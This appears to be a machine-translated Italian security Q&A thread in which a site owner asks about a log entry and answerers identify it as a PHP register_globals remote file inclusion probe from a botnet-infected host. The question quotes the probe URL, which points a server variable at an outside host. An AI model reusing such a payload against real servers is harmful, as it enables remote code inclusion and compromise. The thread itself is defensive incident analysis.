Attacco root del server?

Naviga le tue risposte
4

Qualcuno in Ungheria ha provato qualcosa di strano di recente: 

 /?_SERVER[DOCUMENT_ROOT]=http://94.199.51.7/readme.txt?

Questo è l'URL parziale del mio log, che mostra la pagina a cui sono andati. Hanno dato l'URL del mio sito come referrer.

Che cosa sarebbe, se possibile, questo tipo di accesso a un server vulnerabile?

Grazie per qualsiasi informazione.

    
posta Funnelcake 06.04.2013 - 13:08
fonte

3 risposte

5

Poiché @HendrikBrummermann già evidenziato nei commenti, si è trattato di un tentativo di sfruttare register_globals su un server web abilitato PHP.

Il server che eseguiva la richiesta che finiva nei log del tuo server web, così risultò, era semplicemente un server Web infetto in esecuzione in modalità zombie, eseguendo un bot stealth controllando i possibili vettori di attacco su server Web ignari su Internet per conto di di più grande botnet , controllato attraverso un LeaseWeb BV, il server di comando e controllo in Olanda ha un IP di 87.255.51.229 che ospita centinaia di domini sospetti . Secondo Spamhaus CBL , il server con un IP 94.199.51.7 situato a Budapest, Ungheria è stato infettato da Trojan Hermes:

Hermes is a banking trojan aimed to steal credentials for online banking accounts. It spreads through hijacked websites (drive-by exploits) and malicious email attachments.

Ho analizzato un po 'il comando di comando e controllo di questa botnet e sta eseguendo un Desktop remoto VNC sulla porta 5900, il che significa che è controllato anche da una posizione remota a noi sconosciuta. Ma questo è oltre il punto, poiché è abbastanza normale che tali reti criminali passino semplicemente a un'altra società di hosting, se e quando a chi si affida ora è richiesto dalla legge di agire. Poiché le società di hosting non amano particolarmente agire fino a quando non sono assolutamente costrette a farlo, questo potrebbe non essere nella lista delle cose da fare. Quello che più probabilmente accadrà è che l'attuale IP della botnet sarà contrassegnato come nella lista nera in troppi RBL s per sentirsi a proprio agio operando da ( stato live ) e sposta il comando e il controllo in un'altra società di hosting.

Quindi, in breve, la linea sospetta nei log del tuo server web era solo uno dei vettori di attacco a cui tali botnet sarebbero sottoposti a scansione, cercando i modi per sfruttare i server web. Se l'acquisizione fosse andata a buon fine, la prossima persona che avrebbe aperto la tua pagina web sarebbe stata reindirizzata al server zombie sfruttato a Budapest, in Ungheria e la botnet avrebbe saputo che il tuo server web era quindi sfruttabile controllando la stringa di riferimento. Tuttavia, il tuo server web non era ovviamente il frutto basso che speravano di sfruttare facilmente, almeno non attraverso questo particolare buco di sicurezza PHP. Botnet non si preoccupa e ha continuato a esaminare migliaia di altri host quando hai finito di leggere la mia ultima frase.

Solo un altro giorno sul WWW. ;)

    
risposta data 07.04.2013 - 05:01
fonte
0

Secondo l'URL, lui sta facendo funzionare il sito PHP (variabile _SERVER). L'unico effetto è che avrai definito la variabile _SERVER [DOCUMENT_ROOT] INSIDE _GET. 

Array
(
    [_GET] => Array
        (
            [_SERVER] => Array
                (
                    [DOCUMENT_ROOT] => http://94.199.51.7/readme.txt?
                )

        )
    
risposta data 06.04.2013 - 13:50
fonte
0

In realtà il file readme.txt di questo server è google advertising; -)

Ma se l'exploit globale dei registri avrebbe funzionato, il tuo sito web reindirizza a questo readme.

    
risposta data 07.04.2013 - 01:07
fonte

Leggi altre domande sui tag

In che modo bruteforce decodifica i dati se non sai cosa stai cercando? Riferimento per password non sicura tramite e-mail